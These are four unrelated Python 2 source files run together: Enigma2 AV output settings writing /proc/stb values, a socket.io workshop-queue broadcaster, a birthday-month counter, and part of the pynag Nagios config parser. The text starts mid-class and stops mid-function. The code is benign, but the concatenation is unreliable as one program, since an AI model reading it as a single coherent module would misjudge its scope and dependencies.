		eAVSwitch.getInstance().setColorFormat(value)

	def setAspectRatio(self, value):
		eAVSwitch.getInstance().setAspectRatio(value)

	def setSystem(self, value):
		eAVSwitch.getInstance().setVideomode(value)

	def getOutputAspect(self):
		"""Return the effective output aspect ratio as a (w, h) tuple."""
		valstr = config.av.aspectratio.value
		if valstr in ("4_3_letterbox", "4_3_panscan"): # 4:3
			return (4,3)
		elif valstr == "16_9": # auto ... 4:3 or 16:9
			try:
				# Ask the decoder what the current stream's aspect is.
				aspect_str = open("/proc/stb/vmpeg/0/aspect", "r").read()
				if aspect_str == "1": # 4:3
					return (4,3)
			except IOError:
				pass
		elif valstr in ("16_9_always", "16_9_letterbox"): # 16:9
			pass
		elif valstr in ("16_10_letterbox", "16_10_panscan"): # 16:10
			return (16,10)
		return (16,9)

	def getFramebufferScale(self):
		# NOTE(review): this cross-multiplies (aspect_w * fb_height,
		# aspect_h * fb_width); that looks intentional for computing a
		# scale ratio pair, but confirm against callers.
		aspect = self.getOutputAspect()
		fb_size = getDesktop(0).size()
		return (aspect[0] * fb_size.height(), aspect[1] * fb_size.width())

	def getAspectRatioSetting(self):
		"""Map config.av.aspectratio to the driver's numeric code.

		A dict lookup replaces the old if/elif chain, which raised
		UnboundLocalError for any unknown value; unknown values now fall
		back to 0 (4:3 letterbox).
		"""
		codes = {
			"4_3_letterbox": 0,
			"4_3_panscan": 1,
			"16_9": 2,
			"16_9_always": 3,
			"16_10_letterbox": 4,
			"16_10_panscan": 5,
			"16_9_letterbox": 6,
		}
		return codes.get(config.av.aspectratio.value, 0)

	def setAspectWSS(self, aspect=None):
		"""Program wide-screen signalling according to config.av.wss."""
		if not config.av.wss.value:
			value = 2 # auto(4:3_off)
		else:
			value = 1 # auto
		eAVSwitch.getInstance().setWSS(value)

def InitAVSwitch():
	"""Create the config.av.* settings and wire their notifiers to the AV driver.

	Each addNotifier() call also fires once immediately, pushing the stored
	value into the hardware at startup.
	"""
	config.av = ConfigSubsection()
	config.av.yuvenabled = ConfigBoolean(default=False)
	colorformat_choices = {"cvbs": _("CVBS"), "rgb": _("RGB"), "svideo": _("S-Video")}
	
	# when YUV is not enabled, don't let the user select it
	if config.av.yuvenabled.value:
		colorformat_choices["yuv"] = _("YPbPr")
#	ikseong
	config.av.colorformat = ConfigSelection(choices=colorformat_choices, default="cvbs")
	config.av.aspectratio = ConfigSelection(choices={
			"4_3_letterbox": _("4:3 Letterbox"),
			"4_3_panscan": _("4:3 PanScan"), 
			"16_9": _("16:9"), 
			"16_9_always": _("16:9 always"),
			"16_10_letterbox": _("16:10 Letterbox"),
			"16_10_panscan": _("16:10 PanScan"), 
			"16_9_letterbox": _("16:9 Letterbox")}, 
			default = "4_3_letterbox")

	config.av.aspect = ConfigSelection(choices={
			"4_3": _("4:3"),
			"16_9": _("16:9"), 
			"16_10": _("16:10"),
			"auto": _("Automatic")},
			default = "auto")
	config.av.policy_169 = ConfigSelection(choices={
				# TRANSLATORS: (aspect ratio policy: black bars on top/bottom) in doubt, keep english term.
			"letterbox": _("Letterbox"), 
				# TRANSLATORS: (aspect ratio policy: cropped content on left/right) in doubt, keep english term
			"panscan": _("Pan&Scan"),  
				# TRANSLATORS: (aspect ratio policy: display as fullscreen, even if this breaks the aspect)
			"scale": _("Just Scale")},
			default = "letterbox")
	config.av.policy_43 = ConfigSelection(choices={
				# TRANSLATORS: (aspect ratio policy: black bars on left/right) in doubt, keep english term.
			"pillarbox": _("Pillarbox"), 
				# TRANSLATORS: (aspect ratio policy: cropped content on left/right) in doubt, keep english term
			"panscan": _("Pan&Scan"),  
				# TRANSLATORS: (aspect ratio policy: display as fullscreen, with stretching the left/right)
			"nonlinear": _("Nonlinear"),  
				# TRANSLATORS: (aspect ratio policy: display as fullscreen, even if this breaks the aspect)
			"scale": _("Just Scale")},
			default = "pillarbox")
	config.av.tvsystem = ConfigSelection(choices = {"pal": _("PAL"), "ntsc": _("NTSC"), "multinorm": _("multinorm")}, default="pal")
	config.av.wss = ConfigEnableDisable(default = True)
	config.av.defaultac3 = ConfigYesNo(default = False)
	config.av.generalAC3delay = ConfigSelectionNumber(-1000, 1000, 25, default = 0)
	config.av.generalPCMdelay = ConfigSelectionNumber(-1000, 1000, 25, default = 0)
	config.av.vcrswitch = ConfigEnableDisable(default = False)

	iAVSwitch = AVSwitch()

	# Notifier callbacks: translate config strings to driver codes.
	def setColorFormat(configElement):
		map = {"cvbs": 0, "rgb": 1, "svideo": 2, "yuv": 3}
		iAVSwitch.setColorFormat(map[configElement.value])

	def setAspectRatio(configElement):
		map = {"4_3_letterbox": 0, "4_3_panscan": 1, "16_9": 2, "16_9_always": 3, "16_10_letterbox": 4, "16_10_panscan": 5, "16_9_letterbox" : 6}
		iAVSwitch.setAspectRatio(map[configElement.value])

	def setSystem(configElement):
		map = {"pal": 0, "ntsc": 1, "multinorm" : 2}
		iAVSwitch.setSystem(map[configElement.value])

	def setWSS(configElement):
		iAVSwitch.setAspectWSS()

	# this will call the "setup-val" initial
	config.av.colorformat.addNotifier(setColorFormat)
	config.av.aspectratio.addNotifier(setAspectRatio)
	config.av.tvsystem.addNotifier(setSystem)
	config.av.wss.addNotifier(setWSS)

	iAVSwitch.setInput("ENCODER") # init on startup
	SystemInfo["ScartSwitch"] = eAVSwitch.getInstance().haveScartSwitch()

	# Probe driver capabilities via /proc and expose them through SystemInfo.
	try:
		can_downmix = open("/proc/stb/audio/ac3_choices", "r").read()[:-1].find("downmix") != -1
	except:
		can_downmix = False

	SystemInfo["CanDownmixAC3"] = can_downmix
	if can_downmix:
		def setAC3Downmix(configElement):
			open("/proc/stb/audio/ac3", "w").write(configElement.value and "downmix" or "passthrough")
		config.av.downmix_ac3 = ConfigYesNo(default = True)
		config.av.downmix_ac3.addNotifier(setAC3Downmix)

	try:
		can_downmix_aac = open("/proc/stb/audio/aac_choices", "r").read()[:-1].find("downmix") != -1
	except:
		can_downmix_aac = False

	SystemInfo["CanDownmixAAC"] = can_downmix_aac
	if can_downmix_aac:
		def setAACDownmix(configElement):
			open("/proc/stb/audio/aac", "w").write(configElement.value and "downmix" or "passthrough")
		config.av.downmix_aac = ConfigYesNo(default = True)
		config.av.downmix_aac.addNotifier(setAACDownmix)

	try:
		can_osd_alpha = open("/proc/stb/video/alpha", "r") and True or False
	except:
		can_osd_alpha = False

	SystemInfo["CanChangeOsdAlpha"] = can_osd_alpha

	def setAlpha(config):
		open("/proc/stb/video/alpha", "w").write(str(config.value))

	if can_osd_alpha:
		config.av.osd_alpha = ConfigSlider(default=255, limits=(0,255))
		config.av.osd_alpha.addNotifier(setAlpha)

	if os_path.exists("/proc/stb/vmpeg/0/pep_scaler_sharpness"):
		def setScaler_sharpness(config):
			myval = int(config.value)
			try:
				print "--> setting scaler_sharpness to: %0.8X" % myval
				open("/proc/stb/vmpeg/0/pep_scaler_sharpness", "w").write("%0.8X" % myval)
				# pep_apply commits the new scaler value.
				open("/proc/stb/vmpeg/0/pep_apply", "w").write("1")
			except IOError:
				print "couldn't write pep_scaler_sharpness"

		config.av.scaler_sharpness = ConfigSlider(default=13, limits=(0,26))
		config.av.scaler_sharpness.addNotifier(setScaler_sharpness)
	else:
		# No scaler sharpness control on this hardware; placeholder setting.
		config.av.scaler_sharpness = NoSave(ConfigNothing())


import sys
import time
import logging

from socketio import socketio_manage
from socketio.mixins import BroadcastMixin
from socketio.namespace import BaseNamespace

from DataAggregation.webdata_aggregator import getAvailableWorkshops


# Module logger that also mirrors its records to stdout.
logger = logging.getLogger(__name__)
std_out_logger = logging.StreamHandler(sys.stdout)
logger.addHandler(std_out_logger)


def broadcast_msg(server, ns_name, event, *args):
    """Send one socket.io event packet to every client connected to *server*."""
    packet = {
        "type": "event",
        "name": event,
        "args": args,
        "endpoint": ns_name,
    }
    for _sessid, sock in server.sockets.iteritems():
        sock.send_packet(packet)


def workshops_monitor(server):
    """Broadcast workshop queue sizes to all clients, then push updates forever.

    Runs an infinite polling loop (1s interval); intended to run in its own
    greenlet/thread.
    """
    # Initial snapshot: one [name, size] pair per workshop.
    sizes = []
    workshops = getAvailableWorkshops()
    for w in workshops:
        tmp = [w.workshopName, w.q.qsize()]
        sizes.append(tmp)
        broadcast_msg(server, '', "sizes", tmp)

    while True:
        logger.info("Participants viewing frontend:" + str(len(server.sockets)))
        workshops_available = []
        curr_workshops = getAvailableWorkshops()
        for w in curr_workshops:
            workshops_available.append([w.workshopName, w.q.qsize()])
            wq = filter(lambda x: x[0] == w.workshopName, sizes)[0]
            if wq[1] != w.q.qsize():
                wq[1] = w.q.qsize()
                # Use the module logger here (the old code called
                # logging.info, which bypassed the stdout handler that is
                # attached to `logger`).
                logger.info("client_updater: New update being pushed to clients: " + str(wq))
                broadcast_msg(server, '', 'sizes', wq)
        logger.info("Workshops available:" + str(workshops_available))
        time.sleep(1)


class RequestHandlerApp(object):
    """Minimal WSGI callable that hands /socket.io requests to QueueStatusHandler."""

    def __call__(self, environ, start_response):
        # NOTE(review): non-/socket.io paths fall through and return None,
        # which is not a valid WSGI response — confirm this app is only
        # mounted behind the socket.io server.
        if environ['PATH_INFO'].startswith('/socket.io'):
            socketio_manage(environ, {'': QueueStatusHandler})


class QueueStatusHandler(BaseNamespace, BroadcastMixin):
    """Socket.io namespace that reports workshop queue sizes to each new client."""

    def on_connect(self):
        # Push one [name, size] pair per workshop to the connecting client.
        snapshot = []
        for workshop in getAvailableWorkshops():
            entry = [workshop.workshopName, workshop.q.qsize()]
            snapshot.append(entry)
            self.emit('sizes', entry)

def freq_month(obj):
    if obj is None or obj == []:
        return
    months = {1: 'jan',
              2: 'feb',
              3: 'mar',
              4: 'apr',
              5: 'may',
              6: 'jun',
              7: 'jul',
              8: 'aug',
              9: 'sep',
              10: 'oct',
              11: 'nov',
              12: 'dec',
             }
    frequencies = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]

#    for i in range(0, len(obj)):
#        frequencies[ obj[i] -1] += 1

    for i in obj:
        frequencies[ i-1 ] += 1

    print "The following month(s) have a birthday celebration"
    for i in range(0, len(frequencies)):
        if frequencies[i] > 0:
            print str(months[i+1]) + " has " + str(frequencies[i])
    return frequencies

# Quick manual checks: a sample list and the empty-list edge case
# (the latter returns None).
in_array = [3,6,2,7,7,7,]
print freq_month(in_array)
print freq_month([])

# -*- coding: utf-8 -*-
#
# pynag - Python Nagios plug-in and configuration environment
# Copyright (C) 2010 Drew Stinnet
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

"""This module contains low-level Parsers for nagios configuration and status objects.

Hint: If you are looking to parse some nagios configuration data, you probably
want pynag.Model module instead.

The highlights of this module are:

class Config: For parsing local nagios configuration files
class Livestatus: To connect to MK-Livestatus
class StatusDat: To read info from status.dat (not used a lot, migrate to mk-livestatus)
class LogFiles: To read nagios log-files
class MultiSite: To talk with multiple Livestatus instances
"""
import os
import re
import time
import sys
import socket  # for mk_livestatus
import stat

import pynag.Plugins
import pynag.Utils
import StringIO
import tarfile

# Unique marker used to distinguish "argument not supplied" from None.
_sentinel = object()


class Config(object):

    """ Parse and write nagios config files """
    # Regex matching the start of an object definition, i.e. lines like:
    #     define <object_type> {
    # Group 1 captures the object type; group 2 captures anything after the
    # (optional) opening brace. Written as a raw string so that \s, \w and
    # \{ are passed to the regex engine verbatim instead of being treated
    # as (deprecated) string escapes.
    __beginning_of_object = re.compile(r"^\s*define\s+(\w+)\s*\{?(.*)$")

    def __init__(self, cfg_file=None, strict=False):
        """ Construct a new config parser.

        Args:

            cfg_file (str): Full path to nagios.cfg. When None, the
            location is auto-discovered via guess_cfg_file().

            strict (bool): if True, use stricter parsing which is more
            prone to raising exceptions
        """
        self.strict = strict  # Strict parsing mode flag
        self.cfg_file = cfg_file  # Path to the main configuration file

        # No main config file given -- attempt a minor autodiscovery.
        if self.cfg_file is None:
            self.cfg_file = self.guess_cfg_file()

        self._is_dirty = False
        self.data = {}
        self.maincfg_values = []
        self.reset()  # Initialize the remaining member variables

    def guess_nagios_directory(self):
        """ Return a path to the nagios configuration directory on this system.

        Use this function for determining the nagios config directory in your
        code.

        Returns:

            str. directory containing the nagios.cfg file

        Raises:

            :py:class:`pynag.Parsers.ConfigFileNotFound` if the config file
            location cannot be guessed.
        """
        main_cfg = self.guess_cfg_file()
        if main_cfg is None:
            raise ConfigFileNotFound("Could not find nagios.cfg")
        return os.path.dirname(main_cfg)

    def guess_nagios_binary(self):
        """ Returns a path to any nagios binary found on your system

        Use this function if you don't want specify path to the nagios binary
        in your code and you are confident that it is located in a common
        location.

        The monitoring binaries (nagios, nagios3, naemon, icinga, shinken)
        are first looked up on $PATH via `which`. If none is found there,
        the following well-known locations are checked directly:

        * /usr/bin/nagios
        * /usr/sbin/nagios
        * /usr/local/nagios/bin/nagios
        * /nagios/bin/nagios
        * /usr/bin/icinga
        * /usr/sbin/icinga
        * /usr/bin/naemon
        * /usr/sbin/naemon
        * /usr/local/naemon/bin/naemon.cfg
        * /usr/bin/shinken
        * /usr/sbin/shinken

        Returns:

            str. Path to the nagios binary

            None if could not find a binary in any of those locations
        """
        # Prefer whatever is on $PATH; covers custom install prefixes.
        possible_binaries = ('nagios', 'nagios3', 'naemon', 'icinga', 'shinken')
        for binary in possible_binaries:
            command = ['which', binary]
            code, stdout, stderr = pynag.Utils.runCommand(command=command, shell=False)
            if code == 0:
                return stdout.splitlines()[0].strip()

        # Fall back to well-known absolute locations that might not be on
        # $PATH. (This tuple was previously defined but never consulted.)
        # NOTE(review): '/usr/local/naemon/bin/naemon.cfg' looks like a
        # config file, not a binary -- kept for backwards compatibility.
        possible_files = ('/usr/bin/nagios',
                          '/usr/sbin/nagios',
                          '/usr/local/nagios/bin/nagios',
                          '/nagios/bin/nagios',
                          '/usr/bin/icinga',
                          '/usr/sbin/icinga',
                          '/usr/bin/naemon',
                          '/usr/sbin/naemon',
                          '/usr/local/naemon/bin/naemon.cfg',
                          '/usr/bin/shinken',
                          '/usr/sbin/shinken')
        for file_path in possible_files:
            if self.isfile(file_path):
                return file_path

        return None

    def guess_cfg_file(self):
        """ Returns a path to any nagios.cfg found on your system

        Use this function if you don't want specify path to nagios.cfg in your
        code and you are confident that it is located in a common location

        Checked locations are as follows:

        * /etc/nagios/nagios.cfg
        * /etc/nagios3/nagios.cfg
        * /usr/local/nagios/etc/nagios.cfg
        * /nagios/etc/nagios/nagios.cfg
        * ./nagios.cfg
        * ./nagios/nagios.cfg
        * /etc/icinga/icinga.cfg
        * /usr/local/icinga/etc/icinga.cfg
        * ./icinga.cfg
        * ./icinga/icinga.cfg
        * /etc/naemon/naemon.cfg
        * /usr/local/naemon/etc/naemon.cfg
        * ./naemon.cfg
        * ./naemon/naemon.cfg
        * /etc/shinken/shinken.cfg

        Returns:

            str. Path to the nagios.cfg or equivalent file

            None if couldn't find a file in any of these locations.
        """
        candidates = ('/etc/nagios/nagios.cfg',
                      '/etc/nagios3/nagios.cfg',
                      '/usr/local/nagios/etc/nagios.cfg',
                      '/nagios/etc/nagios/nagios.cfg',
                      './nagios.cfg',
                      './nagios/nagios.cfg',
                      '/etc/icinga/icinga.cfg',
                      '/usr/local/icinga/etc/icinga.cfg',
                      './icinga.cfg',
                      './icinga/icinga.cfg',
                      '/etc/naemon/naemon.cfg',
                      '/usr/local/naemon/etc/naemon.cfg',
                      './naemon.cfg',
                      './naemon/naemon.cfg',
                      '/etc/shinken/shinken.cfg',
                      )

        # Return the first existing candidate, or None if none exist.
        return next((candidate for candidate in candidates
                     if self.isfile(candidate)), None)

    def reset(self):
        """ Reinitializes the data of a parser instance to its default values.
        """
        self.cfg_files = []          # Other configuration files referenced by the main config
        self.data = {}               # Every known object definition, grouped by type
        self.errors = []             # ParserError instances accumulated while parsing
        self.item_list = None
        self.item_cache = None
        self.maincfg_values = []     # The contents of main nagios.cfg
        self._resource_values = []   # The contents of any resource_files
        self.item_apply_cache = {}   # Performance cache used by _apply_template

        # Raw list of every key/value pair found in the config files. Not
        # directly useful until the 'use' (template) relationships between
        # the items have been resolved.
        self.pre_object_list = []
        self.post_object_list = []

        # Maps each object type to the attribute that uniquely names it.
        self.object_type_keys = {
            'hostgroup': 'hostgroup_name',
            'hostextinfo': 'host_name',
            'host': 'host_name',
            'service': 'name',
            'servicegroup': 'servicegroup_name',
            'contact': 'contact_name',
            'contactgroup': 'contactgroup_name',
            'timeperiod': 'timeperiod_name',
            'command': 'command_name',
            # 'service': ['host_name', 'description'],
        }

    def _has_template(self, target):
        """ Return True if the parsed item inherits from a template.

        Args:
            target (dict): Parsed item as produced by :py:class:`pynag.Parsers.config`

        Returns:
            bool. Whether the item carries a 'use' attribute.
        """
        return "use" in target

    def _get_pid(self):
        """ Checks the lock_file var in nagios.cfg and returns the pid from the file

        Returns:
            The pid as a stripped string, or None if the lock_file directive
            or the pid file itself is missing or unreadable.
        """
        try:
            fh = self.open(self.get_cfg_value('lock_file'), "r")
            try:
                return fh.readline().strip()
            finally:
                # Previously the file handle was leaked; always close it.
                fh.close()
        except Exception:
            # Deliberately best-effort: any failure means "no pid available".
            return None

    def _get_hostgroup(self, hostgroup_name):
        """ Returns the hostgroup that matches the queried name.

        Args:
            hostgroup_name: Name of the hostgroup to be returned (string)

        Returns:
            Hostgroup item with the requested name, or None if no such
            hostgroup is known.
        """
        all_hostgroups = self.data['all_hostgroup']
        return all_hostgroups.get(hostgroup_name, None)

    def _get_key(self, object_type, user_key=None):
        """ Return the correct 'key' for an item.

        This is mainly a helper method for other methods in this class. It is
        used to shorten code repetition.

        Args:

            object_type: Object type from which to obtain the 'key' (string)

            user_key: User defined key. Default None. (string)

        Returns:
            Correct 'key' for the object type. (string)

        Raises:
            :py:class:`ParserError` if no user key is given and the object
            type has no known default key.
        """
        # An explicitly supplied key always wins.
        if user_key:
            return user_key
        if object_type not in self.object_type_keys:
            raise ParserError("Unknown key for object type:  %s\n" % object_type)
        # Fall back to the default key for this object type.
        return self.object_type_keys[object_type]

    def _get_item(self, item_name, item_type):
        """ Return an item from a list

        Lazily builds a cache of the items in self.pre_object_list and then
        answers lookups by (type, name) from that cache.

        Args:

            item_name: Name of the item to be returned (string)

            item_type: Type of the item to be returned (string)

        Returns:

            Item with matching name and type from
            :py:attr:`pynag.Parsers.config.item_cache`, or None if absent.
        """
        # Build the local cache on first use.
        # TODO: Rewrite functions that call this function
        if not self.item_list:
            self.item_list = self.pre_object_list
            self.item_cache = {}
            for definition in self.item_list:
                if "name" not in definition:
                    continue
                per_type = self.item_cache.setdefault(
                    definition['meta']['object_type'], {})
                per_type[definition['name']] = definition

        cache_for_type = self.item_cache.get(item_type, None)
        if not cache_for_type:
            return None
        return cache_for_type.get(item_name, None)

    def _apply_template(self, original_item):
        """ Apply all attributes of item named parent_name to "original_item".

        Recursively resolves the 'use' (template inheritance) chain: every
        attribute defined by a parent but absent from original_item is copied
        in, and a record of inherited attributes is kept in the item's meta.

        Args:

            original_item: Item 'use'-ing a parent item. The parent's attributes
            will be concretely added to this item.

        Returns:

            original_item to which have been added all the attributes defined
            in parent items. The item is modified in place and also returned.
        """

        # TODO: There is space for more performance tweaks here
        # If item does not inherit from anyone else, lets just return item as is.
        if 'use' not in original_item:
            return original_item
        object_type = original_item['meta']['object_type']
        raw_definition = original_item['meta']['raw_definition']
        # NOTE(review): when object_type is not yet a key of item_apply_cache,
        # my_cache is a fresh throwaway dict that is never stored back into
        # item_apply_cache -- confirm the cache is populated elsewhere.
        my_cache = self.item_apply_cache.get(object_type, {})

        # Performance tweak, if item has been parsed. Lets not do it again
        if raw_definition in my_cache:
            return my_cache[raw_definition]

        # An item may use several parents: "use parent1,parent2,..."
        parent_names = original_item['use'].split(',')
        parent_items = []
        for parent_name in parent_names:
            parent_item = self._get_item(parent_name, object_type)
            if parent_item is None:
                error_string = "Can not find any %s named %s\n" % (object_type, parent_name)
                self.errors.append(ParserError(error_string, item=original_item))
                continue

            try:
                # Parent item probably has use flags on its own. So lets apply to parent first
                parent_item = self._apply_template(parent_item)
            except RuntimeError:
                # Deep/circular 'use' chains blow the recursion limit; record
                # the problem instead of crashing the whole parse.
                t, e = sys.exc_info()[:2]
                self.errors.append(ParserError("Error while parsing item: %s (it might have circular use=)" % str(e),
                                               item=original_item))
            parent_items.append(parent_item)

        # Copy parent attributes into the child. Earlier parents win, and
        # attributes the child defines itself are never overwritten.
        inherited_attributes = original_item['meta']['inherited_attributes']
        template_fields = original_item['meta']['template_fields']
        for parent_item in parent_items:
            for k, v in parent_item.iteritems():
                # These keys are structural, not inheritable attributes.
                if k in ('use', 'register', 'meta', 'name'):
                    continue
                if k not in inherited_attributes:
                    inherited_attributes[k] = v
                if k not in original_item:
                    original_item[k] = v
                    template_fields.append(k)
        # Only named items (i.e. templates) are cached for reuse.
        if 'name' in original_item:
            my_cache[raw_definition] = original_item

        return original_item

    def _get_items_in_file(self, filename):
        """ Return all items in the given file

        Iterates through all elements in self.data and gathers all the items
        defined in the queried filename.

        Args:

            filename: file from which are defined the items that will be
            returned.

        Returns:

            A list containing all the items in self.data that were defined in
            filename
        """
        return [item
                for object_type in self.data.keys()
                for item in self[object_type]
                if item['meta']['filename'] == filename]

    def get_new_item(self, object_type, filename):
        """ Returns an empty item with all necessary metadata

        Creates a new item dict and fills it with usual metadata:

            * object_type : object_type (arg)
            * filename : filename (arg)
            * template_fields = []
            * needs_commit = None
            * delete_me = None
            * defined_attributes = {}
            * inherited_attributes = {}
            * raw_definition = "define %s {\\n\\n} % object_type"

        Args:

            object_type: type of the object to be created (string)

            filename: Path to which the item will be saved (string)

        Returns:

            A new item with default metadata

        """
        return {
            'meta': {
                'object_type': object_type,
                'filename': filename,
                'template_fields': [],
                'needs_commit': None,
                'delete_me': None,
                'defined_attributes': {},
                'inherited_attributes': {},
                'raw_definition': "define %s {\n\n}" % object_type,
            }
        }

    def _load_file(self, filename):
        """ Parse filename and append the results to self.pre_object_list.

        This function is mostly here for backwards compatibility; new code
        can call parse_file() directly.

        Args:

            filename: the file to be parsed. This is supposed to be a nagios
            object definition file.
        """
        self.pre_object_list.extend(self.parse_file(filename))

    def parse_file(self, filename):
        """ Parses a nagios object configuration file and returns lists of dictionaries.

        This is more or less a wrapper around :py:meth:`config.parse_string`,
        so reading documentation there is useful.

        Args:

            filename: Path to the file to parse (string)

        Returns:

            A list containing elements parsed by :py:meth:`parse_string`.
            On IOError the error is recorded in self.errors and an empty
            list is returned.
        """
        try:
            fh = self.open(filename, 'rb')
            try:
                raw_string = fh.read()
            finally:
                # Previously the file handle was leaked; always close it.
                fh.close()
            return self.parse_string(raw_string, filename=filename)
        except IOError:
            t, e = sys.exc_info()[:2]
            parser_error = ParserError(e.strerror)
            parser_error.filename = e.filename
            self.errors.append(parser_error)
            return []
    def parse_string(self, string, filename='None'):
        """ Parses a string, and returns all object definitions in that string

        Args:

            string: A string containing one or more object definitions

            filename (optional): If filename is provided, it will be referenced
            when raising exceptions

        Examples:

            >>> test_string = "define host {\\nhost_name examplehost\\n}\\n"
            >>> test_string += "define service {\\nhost_name examplehost\\nservice_description example service\\n}\\n"
            >>> c = config()
            >>> result = c.parse_string(test_string)
            >>> for i in result: print i.get('host_name'), i.get('service_description', None)
            examplehost None
            examplehost example service

        Returns:

            A list of dictionaries, that look like self.data

        Raises:

            :py:class:`ParserError`

        """
        # Parser state:
        #   append        - pending text from a backslash-continued line
        #   current       - item dict for the definition being built, or None
        #   in_definition - truthy while inside a "define ... { ... }" block
        #   tmp_buffer    - raw lines of the current definition
        #   result        - all completed item dicts
        append = ""
        current = None
        in_definition = {}
        tmp_buffer = []
        result = []

        for sequence_no, line in enumerate(string.splitlines(False)):
            # Line numbers are 1-based for error reporting.
            line_num = sequence_no + 1

            # If previous line ended with backslash, treat this line as a
            # continuation of previous line
            if append:
                line = append + line
                append = None

            # Cleanup and line skips: blank lines and comments ('#' or ';')
            line = line.strip()
            if line == "":
                continue
            if line[0] == "#" or line[0] == ';':
                continue

            # If this line ends with a backslash, continue directly to next line
            if line.endswith('\\'):
                append = line.strip('\\')
                continue

            if line.startswith('}'):  # end of object definition

                if not in_definition:
                    p = ParserError("Unexpected '}' found outside object definition in line %s" % line_num)
                    p.filename = filename
                    p.line_start = line_num
                    raise p

                in_definition = None
                current['meta']['line_end'] = line_num
                # Looks to me like nagios ignores everything after the } so why shouldn't we ?
                # NOTE(review): 'rest' is computed here but never used.
                rest = line.split("}", 1)[1]

                tmp_buffer.append(line)
                try:
                    current['meta']['raw_definition'] = '\n'.join(tmp_buffer)
                except Exception:
                    raise ParserError("Encountered Unexpected end of object definition in file '%s'." % filename)
                result.append(current)

                # Destroy the Nagios Object
                current = None
                continue

            elif line.startswith('define'):  # beginning of object definition
                if in_definition:
                    # Previous definition was never closed; record the error
                    # and start the new definition anyway.
                    msg = "Unexpected 'define' in (unknown) on line {line_num}. was expecting '}}'."
                    msg = msg.format(**locals())
                    self.errors.append(ParserError(msg, item=current))

                m = self.__beginning_of_object.search(line)

                tmp_buffer = [line]
                object_type = m.groups()[0]
                if self.strict and object_type not in self.object_type_keys.keys():
                    raise ParserError(
                        "Don't know any object definition of type '%s'. it is not in a list of known object definitions." % object_type)
                current = self.get_new_item(object_type, filename)
                current['meta']['line_start'] = line_num

                # Start off an object
                in_definition = True

                # Looks to me like nagios ignores everything after the {, so why shouldn't we ?
                # NOTE(review): 'rest' is computed here but never used.
                rest = m.groups()[1]
                continue
            else:  # In the middle of an object definition
                tmp_buffer.append('    ' + line)

            # save whatever's left in the buffer for the next iteration
            if not in_definition:
                append = line
                continue

            # this is an attribute inside an object definition
            if in_definition:
                #(key, value) = line.split(None, 1)
                tmp = line.split(None, 1)
                if len(tmp) > 1:
                    (key, value) = tmp
                else:
                    # Attribute with no value, e.g. a lone keyword.
                    key = tmp[0]
                    value = ""

                # Strip out in-line comments
                if value.find(";") != -1:
                    value = value.split(";", 1)[0]

                # Clean info
                key = key.strip()
                value = value.strip()

                # Rename some old values that may be in the configuration
                # This can probably be removed in the future to increase performance
                if (current['meta']['object_type'] == 'service') and key == 'description':
                    key = 'service_description'

                # Special hack for timeperiods as they are not consistent with other objects
                # We will treat whole line as a key with an empty value
                if (current['meta']['object_type'] == 'timeperiod') and key not in ('timeperiod_name', 'alias'):
                    key = line
                    value = ''
                current[key] = value
                current['meta']['defined_attributes'][key] = value
            # Something is wrong in the config
            else:
                raise ParserError("Error: Unexpected token in file '%s'" % filename)

        # Something is wrong in the config
        if in_definition:
            raise ParserError("Error: Unexpected EOF in file '%s'" % filename)

        return result

    def _locate_item(self, item):
        """ This is a helper function for anyone who wishes to modify objects.

        It takes "item", locates the file which is configured in, and locates
        exactly the lines which contain that definition.

        Returns: (tuple)

            (everything_before, object_definition, everything_after, filename):

                * everything_before (list of lines): Every line in filename before object was defined
                * everything_after (list of lines): Every line in "filename" after object was defined
                * object_definition (list of lines): Every line used to define our item in "filename"
                * filename (string): file in which the object was written to

        Raises:

            :py:class:`ValueError` if object was not found in "filename"

        """
        if "filename" not in item['meta']:
            raise ValueError("item does not have a filename")
        filename = item['meta']['filename']

        # Re-parse the file and find the definition matching our item.
        my_item = None
        for candidate in self.parse_file(filename):
            if self.compareObjects(item, candidate):
                my_item = candidate
                break
        if my_item is None:
            raise ValueError("We could not find object in %s\n%s" % (filename, item))

        # Split the file's lines into before / definition / after, using the
        # line numbers recorded by the parser.
        fh = self.open(filename)
        all_lines = fh.readlines()
        fh.close()

        start = my_item['meta']['line_start'] - 1
        end = my_item['meta']['line_end']
        everything_before = all_lines[:start]
        object_definition = all_lines[start:end]
        everything_after = all_lines[end:]

        # Join any backslash-continued lines inside the definition so that
        # callers see one logical line per attribute.
        object_definition = self._clean_backslashes(object_definition)
        return everything_before, object_definition, everything_after, filename

    def _clean_backslashes(self, list_of_strings):
        """ Join strings whose lines end with backslash continuations.

            Args:
                list_of_strings: List of strings to join
            Returns:
                A new list of strings where lines ending with a backslash
                have been merged with the line(s) that follow them.

        """
        result = []
        pending = ''
        for fragment in list_of_strings:
            if fragment.endswith('\\\n'):
                # Continuation line: accumulate it. Note str.strip removes
                # '\\' and '\n' characters from BOTH ends of the fragment.
                pending += fragment.strip('\\\n')
            else:
                result.append(pending + fragment)
                pending = ''
        return result

    def _modify_object(self, item, field_name=None, new_value=None, new_field_name=None, new_item=None,
                       make_comments=False):
        """ Locates "item" and changes the line which contains field_name.

        Helper function for object_* functions. Locates "item" and changes the
        line which contains field_name. If new_value and new_field_name are both
        None, the attribute is removed.

        Args:

            item(dict): The item to be modified

            field_name(str): The field_name to modify (if any)

            new_field_name(str): If set, field_name will be renamed

            new_value(str): If set the value of field_name will be changed

            new_item(str): If set, whole object will be replaced with this
            string

            make_comments: If set, put pynag-branded comments where changes
            have been made

        Returns:

            True on success (None if item is None)

        Raises:

            :py:class:`ValueError` if object or field_name is not found

            :py:class:`IOError` if save is unsuccessful.

        """
        # NOTE(review): returns None (not True) when item is None.
        if item is None:
            return
        if field_name is None and new_item is None:
            raise ValueError("either field_name or new_item must be set")
        # Attribute values must stay on a single physical line.
        if '\n' in str(new_value):
            raise ValueError("Invalid character \\n used as an attribute value.")
        everything_before, object_definition, everything_after, filename = self._locate_item(item)
        if new_item is not None:
            # We have instruction on how to write new object, so we dont need to parse it
            object_definition = [new_item]
        else:
